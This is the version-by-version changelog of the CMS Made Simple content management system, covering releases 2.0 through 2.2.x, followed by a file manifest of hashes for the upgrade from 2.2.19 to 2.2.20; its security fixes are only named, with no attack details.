 - Fixes to transaction functions in database abstraction library.
 - Fix CMSModule::GetTemplateResource to no longer accept eval or string resources.
 - Fix CMSSmartySecurityPolicy so that debug_to_log is no longer an allowed function.

   Many thanks to Daniel Le Gall from SCRT SA, Switzerland for reporting the vulnerabilities.

Installation Assistant v1.3.1
 - On upgrade to 2.2.1 move all files from /plugins to /assets/plugins (they should only be third party plugins at this point).
 - On upgrade chmod the config.php to 444.

MicroTiny v2.1.1
 - Fix temporary JS call URL.

News v2.51.1
 - Fix frontend pagination.


Version 2.2 - Canada
----------------------------------
Core - General
  - Automatically turn on file locking for cached files to attempt to mitigate race conditions.
    NOTE:  On systems using archaic filesystems such as FAT and FAT32 CMSMS may no longer operate.
  - cms_filecache_driver now caches for 2 hours by default and has an improved cooperative locking test
  - Implement new database abstraction library that is compatible with (functionality wise) but improves upon adodb-lite.
  - Implement protocol-less URL's in the config.
  - Page tabs are now focusable (you can tab through page tabs and use enter to select one).
  - Minor fix to the {form_start} plugin.
  - Minor change to the {admin_icon} plugin (default image class).
  - Cache more items that are queried from the database, to reduce mysql load.
  - Minor change to tree operations functionality to reduce memory usage.
  - Fixed problem with order of content blocks when using {content_module} stuff.
  - Adds get_usage_string and the concept of a type assistant to template types.
  - Minor change to auto-alias determination routine.
  - Detect module_custom enhancements in the CmsModuleInfo stuff.
  - Refactor Admin authentication.
  - More fixes to the cms_url class.
  - Optimize the include.php file.
  - Adds built-in asynchronous task processing system.
  - Adds the ability to reduce redundant mentions in the Admin log (runs asynchronously).
  - Refactor the Admin log page to allow for better filtering and pagination.
  - Admin log now uses cms_date_format and cleans output.
  - Notification functions in the CmsAdminThemeBase function are now just stubs and do nothing. Will be removed at a later date.
  - Removed the GetNotificationOutput() method from the module API.
  - Adds classes for creating Alerts. This is much more advanced than the old Notifications system.
  - Minor accessibility tweaks to the OneEleven theme.
  - Fix numerous minor problems with the OneEleven theme.
  - Refactored the OneEleven Admin theme to use new Alerts classes instead of old Notifications.
  - Refactor the OneEleven Admin theme to display an alert icon in the shortcut bar, instead of in the navigation area.
  - Fixed sidenav in the one OneEleven theme now works properly. If sidenav is larger than viewport then don't use fixed... easy.
  - In OneEleven Now revert to small sidebar navigation (still floating) if screen is too narrow.
  - Removed notification settings from MyAccount and Global Settings.
  - Removed pseudocron granularity preferences.
  - cms_alert() and the new cms_confirm() JavaScript functions now return promises.
  - Revises much code to use cms_alert and cms_confirm() instead of the standard, but browser specific functions.
  - Fixes to the cache clearing methodology.
  - No longer check for duplicate content blocks in templates... NEEDS TESTING
  - New core events: ContentPreRender, LostPassword, LostPasswordReset, StylesheetPostRender.
  - Fix problem with the default parameter to the {content} tag.
  - Fix problem with the use_smartycache thing in system information.
  - Fix notice in useroperations.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Numerous minor optimizations.
  - Add to content types the ability to set basic attributes for properties from within the page type definition.
  - Fixes problems with pagelink and link content types not being properly editable by additional editors.
  - Adds more type and content cleaning into the content types FillParams method(s).
  - Pass an explicit cacheid in to createtemplate in index.php.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.
  - The {content} tag now supports passing data attributes to the generated textarea, for use by syntax highlighter and WYSIWYG modules. i.e: {content data-foo="bar"}.
  - Refactoring of the Admin login code to be cleaner, more efficient, more secure.
  - No longer allow any modules to auto-upgrade on frontend requests.
  - Fix problem with cms_filecache_driver::clear().
  - Introduces the new Hook mechanism to allow optimizing cms_stylesheet a bit further. All core SendEvent calls are now implemented as hooks.
  - changegroupperms can now localize permission names,  and add an info string for each permission. (the listpermissions hook).
  - Adds add_headtext(), get_headtext(),  add_footertext(), get_footertext() methods to the Admin theme class.
  - minor refactoring of admin/index.php, admin/header.php, admin/footer.php and admin/moduleinterface.php.
  - now use hooks so that loaded modules can now add text to the head area of any Admin page output.
  - Change the help for the basic attributes.
  - Adds new 'switch user' functionality for members of the Admin group.
  - Re-factor the content page selector ... now supports two modes (one for a simple list, and the previous dynamic one that is faster for large sites)
    the simple list mode is used for users with limited edit capabilities on pages.
  - Adds a new Smarty plugin {page_selector} to the Admin lib.
  - New arguments to the CreateHierarchyDropdown function (deprecated) and adjust documentation.
  - Content pages now have the ability to control whether or not the page wants any more children.
  - The TemplateType class now has a help callback to optionally allow retrieving help for templates of a particular type.
  - Permissions are now grouped logically by module/originator in ChangeGroupPermissions.
  - Now use HTTPS for the latest version check.
  - Adds the public_cache_url config entry,  and make sure that the css_url uses that by default.
  - Adds many core hooks.
  - Enhance the {page_image} plugin to optionally output a full HTML img tag if there is a value for the respective property.
  - Improve the {content_image} plugin to output nothing if there is no value for the property, and to output any non-internal arguments as attributes to the HTML img tag.
  - Upgrade to an un-modified version of smarty v3.1.31.
  - Move plugins directory to lib/plugins since we now have the assets/plugins directory for custom plugins.  Upgrading should preserve any custom plugins in the /plugins directory.
  - Add new plugins {thumbnail_url}, {file_url} and {cms_filepicker).
  - Add more intelligence to the tableoption handling for DataDictionary::CreateTableSQL.
  - Minor improvements to the asynchronous behaviour of the locking functionality.
  - #11295 - Cannot change the name of a UDT, always creates new UDT.
  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.
  - #11133 - is_email() fails on domain check.
  - #11235 - munge_string_to_url leaves trailing dashes at the end of munged URL.
  - #11287 - Password reset form's password fields have different lengths.
  - Fix issue with module actions if 'content_en' block name was given on the default content block.
  - Better security when saving content pages.  Most primary fields are cast to their appropriate data type (int, bool, etc).  MenuText, and TitleAttribute can no longer contain html tags like <strong>foo</strong>.
  - Fixes issue with entities in redirecting links
  - The href/page argument to {cms_selflink} is now decoded before resolving to a page id.

Navigator v1.0.5
  - Minor optimizations.
  - Now use pageid in calculations of cacheid.
  - Now output template help to Navigator.

Installation Assistant v1.3
  - Only create dummy index.html files in subdirectories we created.
  - Clear cache after step 9.
  - Upgrade routine now asks for, and tests database credentials.
  - Upgrade routine now rewrites the config.php file (but keeps a backup).
  - Set a few more preferences to reasonable defaults on install. Specifically related to site cleanup and performance.
  - On installation, now insure that tmp/cache and tmp/templates_c directories are empty.
  - Now displays if files are going to be skipped.
  - Adds clear option for development purposes.
  - No longer ask to save database password.
  - On install now create the assets directory structure.
  - On upgrade (for 2.2) now create the assets directory structure and move tmp/configs, tmp/templates, module_custom, admin/custom, etc. within it.
  - When using the expanded installer allow changing the destination directory on step 1.
  - Check for existing files in the installation directory for new installations.
  - Added more notes to aide in diagnosing white screens
  - Modify package .zip files so that extracted files will usually have 644 permission (depends on the unzip routine used).

CmsJobManager
  - New core module to handle queued asynchronous tasks.

Content Manager
  - Minor tweak to bulk delete pages.
  - Minor fix to the active tab when changing a template or design.
  - Now listen to the 'default parent page' user preference.
  - Fix minor XSS problem in the Admin if some loser puts JavaScript into the title field or alias field or menu text field.
  - Now allow filtering pages by owner, editor, template, or design.  Only for Administrators with Modify any page, or Manage all content permissions.
  - Fix problems with auto-refresh being too fast for some operations.
  - Now auto scroll to the first matched page in a find.
  - Additional editors of a page cannot change the content type. Only owners, or users with the Manage all Content permissions.
  - Fix a problem with the call to GetTabElements.

DesignManager
  - Move the designs tab of the main interface into third position.
  - Implement sorting in edit design.
  - Remove option menus (for now) from templates, stylesheets, and designs tab.
  - Modify the template list functionality in edit-design to allow using keyboard control. Space or + to select an item on the left, and right arrow to move.
  - Modify the edit-design functionality to allow clicking on an attached template or stylesheet to edit it.
  - Generic templates now display a usage string.
  - When creating a new template, associate the new template with the default design.
  - Add reset buttons to the filter forms.
  - No longer check for default content block in a template.
  - Adds the ability to export a template to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/templates directory corresponding to a template name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple templates.
  - In the template list, if a file exists for a template... display it in the filename column.
  - Adds the ability to export a stylesheet to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/css directory corresponding to a stylesheet name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple stylesheets.
  - In the stylesheet list, if a file exists for a stylesheet display it in the filename column.

News v2.51
  - Minor fix to add category.
  - Removes GetNotificationOutput method.
  - Add a task that runs at least every 15 minutes to detect draft articles... create an alert for this.
  - Add an option to never create alerts about draft News articles.
  - Minor optimizations.
  - Adds postdate as parameters in events.
  - now output template help to Navigator.
  - Adds new 'linked file' type field that allows selecting a file using the filepicker.
  - Changes the default summary and detail templates to support the linked_file field type, and uses {thumbnail_url} and {file_url}.

FileManager v1.6.3
  - Move settings to it's own menu item under Site Admin.
  - Fix minor problem with moving a directory.
  - Minor fix to move file functionality.
  - Adds OnFileDeleted event.
  - Adds 'view raw file' icon in each viewable row.
  - Minor formatting changes in file list.
  - Now display clickable path entries for easier navigation.

Search
  - Convert to store all data using the InnoDB engine.
  - Use transactions for the addwords and deletewords stuff for performance.
  - Fix problem with query and record expiry.

AdminSearch v1.0.3
  - Fixes problem with use of 'Use Admin Search' permission.
  - Now searches for matching strings within templates and stylesheets that are stored as files.
  - Now listens to the HasSearchableContent metod when searching content pages.

ModuleManager
  - Now detect if module_custom directories exist and are populated and warn about this before upgrading a module.
  - Minor string changes.
  - Improvements to error handling in the new versions tab.
  - Write a confirmation form for uninstalling a module that displays the UninstallPreMessage or uses a default.
  - Now don't allow disabling / uninstalling myself.
  - Don't hide the upgrades tab when there are no upgrades, but show the number of upgrades in the tab title instead.
  - Now use HTTPS for requests to ModuleRepository.
  - Trigger a hook before exporting a module to XML.

MicroTiny v2.1
  - New version of the tinymce wysiwyg editor.
  - Adds a mailto plugin.
  - Now use the FilePicker module for a filepicker, required rewriting the cmsms_filepicker tinymce plugin.
  - Enable the title attribute on the image plugin.
  - Now uses PUBLIC_CACHE_LOCATION for cache files instead of hardcoding tmp/cache


Version 2.1.6 - Spanish Wells
----------------------------------
Core - General
  - Now attempt to detect if a template name passed into CmsModule::GetTemplateResource() is already a resource string.
  - endswith is now an accepted function in Smarty templates (fixes typo in security policy).
  - Fixes for CmsNlsOperations when using a language detector.
  - Fixes warnings in useroperations.
  - Fixes problem with cms_selflink dir='up' since 2013.
  - Modifies the OneEleven theme to set the meta referrer attribute for security purposes.
  - Modifies the functionality of the CSRF tokens to be more secure (only set the cookie in one location, only set the session variable from the cookie).
  - Increase Admin users list limit.
  - Reduce time limit for daily version check to 3 seconds.
  - cleanValues in Admin log and List Content.
  - Minor fix to the relative_time plugin.
  - Admin menu item URLs can now be built from the remaining members of the object, if not specified.
  - {content_image} and {content_module} now preserve order properly and support the priority attribute.

  - #11198 - Fixes problem with cms_selflink with aliases that starts with a numeric sign.

Content Manager v1.1.4
  - Fix bulk set-non-cachable functionality.
  - Fix a bug wrt content blocks and the adding flag.

Installation Assistant v1.0.4
  - Adds recommended check for ZipArchive.
  - Improves method of determining a temp directory.

ModuleManager v2.0.5
  - Improves functionality if ModuleRepository is not available.

News v2.50.6
  - Minor fix to editing news articles from the Admin interface.


Version 2.1.5 - High Rock
----------------------------------
Core - General
  - Fix fatal error if an extcss stylesheet was placed in the Admin theme.
  - Another minor fix to clearing cached files.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Improve the way page aliases are munged when they are supplied.
  - Improve the error generated when a page alias cannot be generated.
  - Minor fixes to the form_start plugin.
  - Minor fixes to generation of moduleinfo.ini.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.

  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.

Content Manager
  - Improve error handling in Edit Content.
  - Fix a problem with the call to GetTabElements.

Design Manager
  - Fix problem with resetting a template back to factory defaults, or creating a new template from factory defaults.

Module Manager
  - Improve the way modules with dependencies are installed and upgraded. (Got rid of the queue stuff).

AdminSearch
  - Use 'Manage Stylesheets' permission, not 'Modify Stylesheets' when searching stylesheets.

Phar Installer
  - Adds missing 'Manage Stylesheets' permission that would not be created on upgrade from 1.12.



Version 2.1.4 - Freetown
----------------------------------
Core - General
  - Fix to the clear_cached_file() method which should fix problems with module installation.
  - Minor tweak to distributed sample htaccess.txt file.

Phar Installer
  - Fixes issues with respect to hanging on step 7 when suhosin PHP addon was installed.
  - Minor PHP7 Fixes.

Module Manager
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.


Version 2.1.3 - Black Point
----------------------------------
Core - General
  - Security fix to prevent HTTP_HOST attacks. Many thanks to I-TRACING (www.i-tracing.com) for reporting it!!
  - Remove stub .htaccess files from subdirectories.
  - Update the included sample htaccess.txt file for security.
  - Fix for endless loop when calculating a page alias in utf-8 environments.
  - Fix for endless loop when calculating a page alias and a page name/title ended with -
  - Fixes a notice on the login page.
  - Optimize LoadContentFromId() to be typesafe, and use default page, if the id passed in is invalid.
  - Fix error condition if there were no default default design, or default page template.
  - Fix problem with system verification.

  - #10825 - Admin-account settings don't remember startpage if you set one
  - #10874 - When creating a page and the title has specific characters, CMSMS stops responding
  - #10910 - content and content_module order incorrect Admin page
  - #10911 - 'Use Admin Search' permission not being used in 2.1.2
  - #10921 - Content Field to Display in Name Column not used

AdminSearch v1.0.1
  - Minor fix to permissions checks.

Navigator v1.0.3
  - Improved exception handling on install

News v2.50.5
  - Fix error condition if no results were returned.

Installation Assistant v1.0.3.1
  - Tweaks to README files.
  - Improved error handling in some circumstances.
  - Fix some PHP7 issues.

FileManager
  - #10871 - Filemanager moving folder


Version 2.1.2 - Andros Town
----------------------------------
Core - General
- Minor fix to missing language string stuff
- Fixes to home page preferences
- API documentation fixes (minor)
- Fixes for ajax_content (the Ajax routine behind the parent selector in edit content) to handle ordering inconsistencies
- Remove die statement in is_email
- Minor fix to the relative_time modifier
- Upgrade CMSMailer to 6.2.14
- Now do a check for E_ALL in the system info

News v2.50.4
- Now all field definitions can be deleted
- Minor fix to default action if no results were returned...

ModuleManager v2.0.2
- Revamp module dependency calculations when installing a module
- Minor fix for some notices in install and upgrade modules
- Minor typo fixes
- Minor fixes for PHP7

MenuManager  v1.50.2
- make sure that uninstall cleans up properly

MicroTiny v2.0.3
- minor template fix
- fixes for stylesheet overrides


Version 2.1.1 - Nicholls Town
----------------------------------
Core - General
- Fix the template compiler so that content blocks can be placed within sub templates and detected with the {include} tag
- Fix minor problem with checksum verification
- Fix to the cms_cache_handler class
- Minor fix to SetAllPageHierarchies()
- Correct location where session was started in frontend displays
- Fix the default option for {content_image}
- Modify the locker to use a beacon if supported, when unlocking
- Fix missing permissions when a 1.12 site was upgraded (installation assistant)

CMSContentmanager v1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear content locks (Admins can clear all locks, regular users can only clear their locks)
- Enhancements to the action to bulk set designs to show only page templates by default, but to optionally show more

DesignManager v1.1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear template and CSS locks (Admins can clear all locks, regular users can only clear their locks)


Version 2.1 - Bahamas
----------------------------------
Core - General
- Minor performance tweaks to sample htaccess.txt
- Minor fix to the ProcessTemplateFromDatabase module API method.
- Improvements and re-factor the way headers are sent wrt caching
- Add a new method to the ModuleOperations class to allow a module to be within a namespace.
- Enhances the Group class.
- Enhancements and fixes to the cms_url class.
- Modified the $mod->smarty reference to be smarter... it is now deprecated.
- Fixes issue with https requests (#10697)
- Modifies The CmsLayoutTemplate class and CmsLayoutTemplateQuery to allow filtering on listable or non listable
  or setting a template as listable (default) or non listable
- Fixes a problem with styling of the login form if tasks must be run AND a module needs upgrading.
- Fixes to the cloning of templates in CmsLayoutTemplate
- Fixes problem with SetAllHierarchyPositions that cleared the entire cache instead of only the necessary part of it.
- Adds the unloadCancel handler to the lockManager jQuery plugin.
- Moves version.php and include.php inside the lib directory so that they are easier to protect from unwanted direct access.
- Fixes to page alias tests when manually entering a page alias.
- Missing language strings are no longer output to Admin log, but to the debug log.
- Requests for modules that are not installed/enabled, or for invalid actions will now result in 404 errors.
- Fixed problem where restricted content editors could implicitly change the page alias.
- Improvements to the system information page, particularly the bbcode output.
- cms_init_editor, form_start, and cms_action_url plugins are no longer cachable.
- Adds the 'adminonly' option to the {content}, {content_image}, and {content_module} tags to allow only members of the 'Admin' group to manipulate the values of that block.
- Add a trivial check to the sitedown message to make sure that it is not empty.
- Minor fixes for PHP 7

MicroTiny v2.0.2
- Now add page hierarchy to autocomplete text when using the linker.
- Now use $smarty->CreateTemplate for clarity when compling the config template
- Now explicitly assign urls so that they do not get caced by smarty.
- Slightly tweak the default HTML content in the example tab.
- Updated tinymce to the latest 4.2.7 version, included the 'paste' plugin, and turned on 'paste_as_text'.
- Added the ability to enable the table plugin, now distribute the table plugin

CMSContentManager v1.0.2
- Fix problem with pagedefault metadata.
- Fixes for handling no listable templates for a design
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.
- Minor fix to copycontent

DesignManager v1.1
- Adds ability to toggle the listability of a template.
- Fixes problems with lost changes if there is a syntax error in the template.
- More work with locking.  With only one exception all locking and unlocking is initiated via JavaScript.

News v2.50.3
- Fixes minor issue with pagination in News Admin console.
- Fix errors in the default form template.
- Fixed URL to long issues on redirection after adding/editing article.

Search v1.50.2
- Minor PHP7 fixes.

ModuleManager 2.0.1
- Minor fix to which modules could be uninstalled and deactivated.


Version 2.0.1.1 - Adelaide
----------------------------------
Fix to the $this->smarty magic method in the module class to resolve to the action template or the global Smarty.


Version 2.0.1 - Adelaide
----------------------------------
Core - General
- Improved optimization in ContentOperations::SetAllHierarchyPositions.
- Fixed return type of ContentOperations::GetPageIdFromAlias().
- Help for the {cms_html_options} plugin.
- Change the default page template to use {Navigator}.
- Explicitly force $smarty->fetch() to create a new template, and therefore a new scope. Keep track of scopes in a stack.
- Change prototype to CMSModule::DoActionBase to pass in the current template object.
- SITENAME is now assigned as a Smarty global.
  (fixes some variable scope issues)
- Fix problem with changing content types.
- Fix problem with CmsLayoutTemplateQuery wrt the editable option, that generated an SQL error.
  (resolves problems where people have additional editor access to templates, but no other design manager permissions).
- Fix minor JavaScript errors in plugin (error checking).
- Fix problems where If assign was passed to a {content} tag, do not pass it to the module on a mact request.
- Implements the completely forgotten 403 exception stuff and the IsPermitted content method.
- Improve the cmsms_dirtyform jQuery plugin to support the unload handler and an onUnload callback.
- Fixed the jQuery page selector plugin when the current value points to an invalid page,  and fixes for asynchronous Ajax.
- Adds a globally available cms_busy() JavaScript function for the Admin.
- Fix problem with html entitites in email addresses in user settings.
- Fix problem with {content cssname=string} and quotes.
- Changed cmsms plugins to use $smarty->getTemplateVars() instead of $smarty->get_template_vars() because of scope issues.
- Minor fix to {form_start} when not used in a module.
- Improved error handling for cms_stylesheet.  Now will generate a message in the Admin log, and an html comment on error.

CMSContentManager v1.0.1
- Fixes for changing content types.
- Adds a title for some contextual help if a template is not available for a content item.
- Clear any locks if an exception occurred while submitting a content item.
- Improvements to error handling with apply and preview.
- Content list now refreshes every 30 seconds to display up-to-date lock information.

DesignManager v1.0.1
- Clear the type_default flag when copying a template.
- Clear any locks if an exception occurred while submitting a template.
- Clear any locks if an exception occurred while submitting a stylesheet.
- Template and stylesheet lists now refresh every 30 seconds to display up-to-date lock information.
- Fixes for design exporting templates with protocol-less URLs in them.

MenuManager v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

Navigator v1.0.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Minor change to the help ($node->children_exist)

Search v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

News v2.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Fix problem with custom fields not being assigned in fesubmit.
- Fix minor problem with html entities in the detail template parameter.

FileManager v1.5.1
- Fix minor problem with Smarty scope in the drop zone.


Version 2.0 - Australia
----------------------------------
+++ Initial Release +++
MANIFEST.DAT000066600000033476146145037700006334 0ustar00MANIFEST GENERATED: 1714587640
MANIFEST FROM VERSION: 2.2.19
MANIFEST FROM NAME: Selkirk
MANIFEST TO VERSION: 2.2.20
MANIFEST TO NAME: Saguenay
ADDED :: 9690ae59cf5e805f738ad98fd019aed1 :: lib\functions\compat.functions.php
ADDED :: ecff247619854fdbc6ca374155000b9c :: lib\functions\content.functions.php
ADDED :: 176c903ee4f1a2da8af858ed041e8008 :: lib\functions\misc.functions.php
ADDED :: 540016eb5f2de3afdd85316600573344 :: lib\functions\module.functions.php
ADDED :: 8b2da4a762671fb05a4ac44924ffc86d :: lib\functions\page.functions.php
ADDED :: 8702da7900f126e3641bf6fc84e368e9 :: lib\functions\test.functions.php
ADDED :: b8180d20773c187c05d18388ef9f671b :: lib\functions\translation.functions.php
ADDED :: c6aa5a39198317079f4d73e5a0aae9dd :: lib\smarty\functions.php
ADDED :: fcd3239cf46c54619c6b2dd7b5e9b675 :: lib\smarty\plugins\modifier.count.php
ADDED :: 35c1bf1cdd540acce7c855b886a8797f :: lib\smarty\plugins\modifier.implode.php
ADDED :: d7739840a38a9914580d196a3f459031 :: lib\smarty\plugins\modifiercompiler.json_encode.php
ADDED :: 4659121c8d8af399a8294b6b7f905e74 :: lib\smarty\plugins\modifiercompiler.nl2br.php
ADDED :: 27caac0e5c6e1c7f953828d913a32059 :: lib\smarty\plugins\modifiercompiler.round.php
ADDED :: ebcec48b98c5b20538a51ed99cfc2361 :: lib\smarty\plugins\modifiercompiler.strlen.php
ADDED :: 4090b924c921a720e343107cc7e02cc9 :: lib\smarty\plugins\modifiercompiler.str_repeat.php
ADDED :: 497b5e7753e99055c494757f1e7f0293 :: lib\smarty\plugins\modifiercompiler.substr.php
ADDED :: af86f0b2ef537ad871644ac991500277 :: modules\CMSContentManager\moduleinfo.ini
ADDED :: c6e7afefea308aec9b4b42876269fc07 :: modules\CmsJobManager\moduleinfo.ini
ADDED :: 8a8242250cbaf2f42150cfb33cbcc73d :: modules\DesignManager\moduleinfo.ini
ADDED :: c3f33792f2defdaa8c66cb5901120811 :: modules\FileManager\moduleinfo.ini
ADDED :: 212639d0c59e98ef3b9ca5d01d1bfaac :: modules\FilePicker\lang\ext\de_DE.php
ADDED :: 39810c46d01e7373aa03ca32a1b53e03 :: modules\FilePicker\moduleinfo.ini
ADDED :: 7954d651db8d65e4cc23aad97ea5bfeb :: modules\Navigator\moduleinfo.ini
ADDED :: db11b93cc53c3ca0d14b2ae22d5b3341 :: modules\News\moduleinfo.ini
ADDED :: eeced6f99d1965303930b799bac369c6 :: modules\UserGuide\action.admin_settings.php
ADDED :: b153799c94dd289db629f423df1df4e7 :: modules\UserGuide\action.default.php
ADDED :: ccb37efe6348dd34279957478acdf05c :: modules\UserGuide\action.defaultadmin.php
ADDED :: c7c8e2a7dcd9e45e06ceeb283985ab70 :: modules\UserGuide\action.delete_page.php
ADDED :: c681ba4324b081fc449534fa1f00234c :: modules\UserGuide\action.edit_page.php
ADDED :: 97bdf6b2a3f08d0dc8921b6440b19fb7 :: modules\UserGuide\action.reorder_page.php
ADDED :: 0675968c55a220664f22bc97d31fd0a6 :: modules\UserGuide\action.toggle_active_page.php
ADDED :: 3f35896fd02acade5386ef52fca46ac5 :: modules\UserGuide\action.toggle_admin_only.php
ADDED :: 201eebd0619d047fdb507a5efa40b769 :: modules\UserGuide\lang\en_US.php
ADDED :: 99954435d1c456f8d956881e56896190 :: modules\UserGuide\lang\ext\de_DE.php
ADDED :: b2a7beedd0a6163144b54e85d2932f63 :: modules\UserGuide\lang\ext\fr_FR.php
ADDED :: 4345ad36545a282d857eaf4e926b313d :: modules\UserGuide\lang\ext\pt_PT.php
ADDED :: 1c9e51fa2b65970ba4d3596c2a50a8dd :: modules\UserGuide\lang\LICENCE.txt
ADDED :: 272bf611893d8a530a76eb110cd1b260 :: modules\UserGuide\lib\class.UserGuideImporterExporter.php
ADDED :: 39863e78fbb6ae2f32645d3a5f1e4594 :: modules\UserGuide\lib\class.UserGuideItem.php
ADDED :: 4b828079a7852eb089048407e9fad2e3 :: modules\UserGuide\lib\class.UserGuideQuery.php
ADDED :: e424b8728fc82edd3d42c786f74d6bc9 :: modules\UserGuide\lib\css\UserGuide_admin.css
ADDED :: 83d99a0bddbab645ec658bc3faa40d65 :: modules\UserGuide\lib\images\loading.gif
ADDED :: c89ca4afd2d7bea404f132e24fa0a021 :: modules\UserGuide\lib\js\UserGuide_admin.js
ADDED :: d48eb9d8737d57e2a6dcb89f0c1e57b6 :: modules\UserGuide\lib\userguide_default_content.xml
ADDED :: 78a964587ac1453eca758c94d7f711bf :: modules\UserGuide\method.install.php
ADDED :: 31462ab435b05473b2816df0d6c15c52 :: modules\UserGuide\method.uninstall.php
ADDED :: a551b7f2114b1a47180fc960c2df79b0 :: modules\UserGuide\method.upgrade.php
ADDED :: 0325558404bc757214e1f9c3d324a8cb :: modules\UserGuide\moduleinfo.ini
ADDED :: fca34ef360099caf9610116ce09cfcb9 :: modules\UserGuide\templates\admin_edit_page.tpl
ADDED :: 407663b7e1027984034b916ea2370a68 :: modules\UserGuide\templates\admin_settings.tpl
ADDED :: 8af193474c4a6d8f88e6b600de3d11f1 :: modules\UserGuide\templates\admin_user_guide_page.tpl
ADDED :: f7dd6283836fd8fb7b79b8a5d8aaf095 :: modules\UserGuide\UserGuide.module.php
DELETED :: 9690ae59cf5e805f738ad98fd019aed1 :: lib\compat.functions.php
DELETED :: 437cf393e6af1e1af974c2db39aef769 :: lib\content.functions.php
DELETED :: 81f19c46f063c7919f4cbed7f33511ef :: lib\misc.functions.php
DELETED :: 26383b1df50194b7676862af17e11b0d :: lib\module.functions.php
DELETED :: 4efa950ec4122380e8e3f01e8dec15a8 :: lib\page.functions.php
DELETED :: f3a2e3767ebf763b3d0e6e5d9999f318 :: lib\test.functions.php
DELETED :: ab9aa0cbba2aa6d90c46c0065e097c4f :: lib\translation.functions.php
DELETED :: 857387aa6e136db43447bbcfdb90455d :: modules\FileManager\icons\themes\default\extensions\16px\tmp.png
DELETED :: 857387aa6e136db43447bbcfdb90455d :: modules\FileManager\icons\themes\default\extensions\32px\tmp.png
CHANGED :: d983f44d978469ca278f9b261ab086b1 :: admin\checksum.php
CHANGED :: 29bc69c74b1c7a7a4b44cb328a1955af :: admin\editusertag.php
CHANGED :: 8b166d1fd3f65511ed6318932aac98c2 :: admin\index.php
CHANGED :: 89e95d28e3dadf730556d5679426559e :: admin\systeminfo.php
CHANGED :: 768200834eeeb016b1fbf75488f34762 :: admin\systemmaintenance.php
CHANGED :: e743ce33a84bcd0a0c0a4148d4169e1d :: doc\CHANGELOG.txt
CHANGED :: 1efd7529e0c25547d59361893fa4ceda :: lib\classes\Async\class.Job.php
CHANGED :: 8a2d4acbb2beb3ae394acaafc2580bef :: lib\classes\class.CmsAdminThemeBase.php
CHANGED :: b3fc74ec32feee82938a7b74eb6edd6f :: lib\classes\class.CmsApp.php
CHANGED :: 76d12285dfbe8925e37bc0cb8346e4e8 :: lib\classes\class.CmsException.php
CHANGED :: 2cf1ea58dcb0c6500862e5818106472a :: lib\classes\class.CMSModule.php
CHANGED :: c517f5c456cf8bb70658f76b0257c680 :: lib\classes\class.cms_http_request.php
CHANGED :: 28b51992a4c3184fddb7a3cdbf13a40a :: lib\classes\class.cms_utils.php
CHANGED :: 4c69807f944f582904dd0c1271636a03 :: lib\classes\class.ContentBase.php
CHANGED :: 96eb8f444dd8effc3336cc98390523b8 :: lib\classes\class.contentoperations.inc.php
CHANGED :: 000f10c2563d3716ecf15364689ca0ea :: lib\classes\class.moduleoperations.inc.php
CHANGED :: 305a87d9df0e1f56bad4c99eb15257e0 :: lib\classes\class.user.inc.php
CHANGED :: a7280b04b95591c1028a9d70b91842fd :: lib\classes\class.usertagoperations.inc.php
CHANGED :: 845873b9d037efbbe44627853b0b4b1a :: lib\classes\contenttypes\ErrorPage.inc.php
CHANGED :: 915e2278ba9fd5d4ee9e0da1ab70331f :: lib\classes\Database\class.Connection.php
CHANGED :: c649fc404a80173b6af0bfd4ecebf9a4 :: lib\classes\Database\class.ResultSet.php
CHANGED :: 701c3b56b0bf467cfe10e0355e32cb2c :: lib\classes\Database\mysqli\class.Connection.php
CHANGED :: 314d8ca204ff530a61e3cf64518c707c :: lib\classes\Database\mysqli\class.DataDictionary.php
CHANGED :: 02052a41e41a33fdb8d34ca56c908cb7 :: lib\classes\Database\mysqli\class.ResultSet.php
CHANGED :: cbecc6d1e1728b8ac7af7d8fd5cca376 :: lib\classes\Database\mysqli\class.Statement.php
CHANGED :: 0bf120475418a632d84981a92ab2f007 :: lib\classes\internal\class.CMSSmartyBase.php
CHANGED :: fef3c7049ca5f5d34a7be4233bac52a6 :: lib\classes\internal\class.CMSSmartySecurityPolicy.php
CHANGED :: 0427c3fc0e56183ec1f3a8845ec30bad :: lib\classes\internal\class.page_template_parser.php
CHANGED :: 0fa391654f2130e25ae24a7bc16dae65 :: lib\classes\internal\class.Smarty_CMS.php
CHANGED :: b6ebcd8c579d4fa76616d7ab58a8399e :: lib\classes\internal\class.Smarty_Parser.php
CHANGED :: 8353c53326b5de5c6068489ecc9daa26 :: lib\html_entity_decode_php4.php
CHANGED :: 38ae0d40358eb3c8b0215b00a3c25d2d :: lib\include.php
